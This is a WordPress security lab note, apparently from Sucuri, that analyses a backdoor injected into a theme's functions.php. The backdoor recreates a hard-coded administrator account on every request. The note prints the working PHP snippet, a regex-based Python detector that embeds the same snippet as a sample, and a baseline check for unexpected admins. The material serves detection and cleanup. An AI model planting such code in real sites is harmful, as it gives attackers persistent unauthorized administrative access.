Evil Self-Regenerating WordPress Administrator User

Labs Note

Attackers often aim to conceal their presence using different methods, such as injecting redirect scripts, creating spam pages, or hiding a mailer in checkout pages to steal credit cards; but this is not always the case.

We’ve seen some websites where hackers were doing the very opposite. Recently, we noticed a malicious administrative user who had managed to make a permanent account on the system. When the actual website administrator attempted to remove the bad guy, WordPress reported that the user was successfully deleted. However, after reopening the Users tab, the unwanted admin user appeared again as if nothing had happened.

Such behavior gives the impression that the user is a permanent part of the system, since they keep reappearing in the Users tab!

After the investigation, we found that the following code had been injected into the theme’s functions.php file:

```php
function admin_account() {
    // Hard-coded credentials for the rogue account
    $user  = 'admin2';
    $pass  = 'Abc12345!';
    $email = 'email2@domain.com';

    // Only (re)create the account when neither the login nor the email exists yet
    if ( ! username_exists( $user ) && ! email_exists( $email ) ) {
        $user_id = wp_create_user( $user, $pass, $email );
        $user    = new WP_User( $user_id );
        // Escalate the new account to administrator
        $user->set_role( 'administrator' );
    }
}
// Run on every request, as soon as WordPress has loaded
add_action( 'init', 'admin_account' );
```

What does this snippet mean? The code is pretty simple. We can see that it defines a function named admin_account. It specifies only the three parameters required for user creation – user, password, and email.

Then the if conditional statement checks whether the user is already present on the system – and if not, it creates a new one. So, the regenerating function is ready. What next?

The function needs to be triggered quite often to let the rogue user regenerate almost immediately. For that purpose, the attackers added the last part of the code, binding the admin_account function to the init action, which fires on every request once most of WordPress has loaded.

Removing the mentioned code from the functions.php file ended the “immortality” of the bad user, and the evil was banished.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website, even if the obvious backdoor is removed. Knowing your site’s structure and actively monitoring it (being alerted whenever a file is changed or added to your site) will help you identify alien admin users and unwanted code injections.
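The two checks that would have shortened this investigation are a static scan of theme and plugin PHP for the three ingredients described above (wp_create_user, set_role('administrator') and an early action hook) and a comparison of the current administrator list against a known-good baseline. The script below is an added example written for this note, not Sucuri’s own tooling; the PHP samples and the user lists are constructed for the demonstration, and the hook names it looks for beyond init (wp_loaded, admin_init) are an assumption about where such code is commonly attached. Obtaining the live administrator list (for instance with `wp user list --role=administrator --field=user_login`) is left to the operator.

```python
"""Heuristic detector for the self-regenerating WordPress admin pattern.

Added example for this Labs Note (not Sucuri's code). It scans PHP source
text for the combination of user creation, administrator escalation and an
early action hook, and diffs live admins against a baseline you maintain.
"""
import re

# Early hooks on which a regeneration function is likely to be attached
# (assumption: init is what this note documents; the others are plausible
# alternatives a defender should also watch).
HOOKS = ("init", "wp_loaded", "admin_init")

CREATE_USER_RE = re.compile(r"wp_create_user\s*\(", re.I)
SET_ADMIN_RE = re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)", re.I)
HOOK_RE = re.compile(
    r"add_action\s*\(\s*['\"](" + "|".join(HOOKS) + r")['\"]\s*,\s*['\"](\w+)['\"]",
    re.I,
)
# Hard-coded credentials assigned to locals ($user = '...', $email = '...', $pass = '...')
ASSIGN_RE = re.compile(r"\$(user|email|pass)\s*=\s*['\"]([^'\"]*)['\"]", re.I)


def scan_php_source(src: str):
    """Return a finding dict when all three indicators are present, else None."""
    hook = HOOK_RE.search(src)
    if not (hook and CREATE_USER_RE.search(src) and SET_ADMIN_RE.search(src)):
        return None
    fields = {name.lower(): value for name, value in ASSIGN_RE.findall(src)}
    return {
        "hook": hook.group(1).lower(),
        "hooked_function": hook.group(2),
        "username": fields.get("user"),
        "email": fields.get("email"),
        # Never echo the password itself into logs; only record that it is hard-coded
        "password_hardcoded": "pass" in fields,
    }


def scan_sources(sources: dict):
    """Scan a mapping of filename -> PHP source; return [(filename, finding), ...]."""
    results = []
    for name, src in sources.items():
        finding = scan_php_source(src)
        if finding:
            results.append((name, finding))
    return results


def unexpected_admins(current_admins, baseline_admins):
    """Administrator logins present now that are not in the approved baseline."""
    return sorted(set(current_admins) - set(baseline_admins))


# --- constructed samples -------------------------------------------------
# The injected snippet exactly as reported in the note.
MALICIOUS_SAMPLE = r"""<?php
function admin_account(){$user = 'admin2';$pass = 'Abc12345!'; $email = 'email2@domain.com';if ( !username_exists( $user ) && !email_exists( $email ) ) {$user_id = wp_create_user( $user, $pass, $email );$user = new WP_User( $user_id );$user->set_role( 'administrator' );} }add_action('init','admin_account');
"""

# A legitimate use of wp_create_user (activation hook, no admin escalation)
# that must not be flagged.
BENIGN_SAMPLE = r"""<?php
function demo_setup() { wp_create_user( 'demo', wp_generate_password(), 'demo@example.com' ); }
register_activation_hook( __FILE__, 'demo_setup' );
"""

if __name__ == "__main__":
    for filename, finding in scan_sources(
        {"themes/x/functions.php": MALICIOUS_SAMPLE, "plugins/demo/demo.php": BENIGN_SAMPLE}
    ):
        print(f"[!] {filename}: {finding}")
    # Constructed admin lists: the baseline is what the site owner approved.
    print("unexpected admins:", unexpected_admins(["admin", "admin2"], {"admin"}))
```

The regexes are deliberately loose about whitespace because, as in the sample above, injected code is usually minified onto a single line; they will still miss an obfuscated variant (string concatenation, base64, variable function names), so treat a hit as a strong signal and a miss as no evidence. Running the baseline diff on a schedule catches the regeneration even when the injected file has been moved somewhere the scanner does not look.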

If you see your site having unwanted administrator users but you can’t locate the code that is creating them, you might want to have us scan your site for malware and clean it.
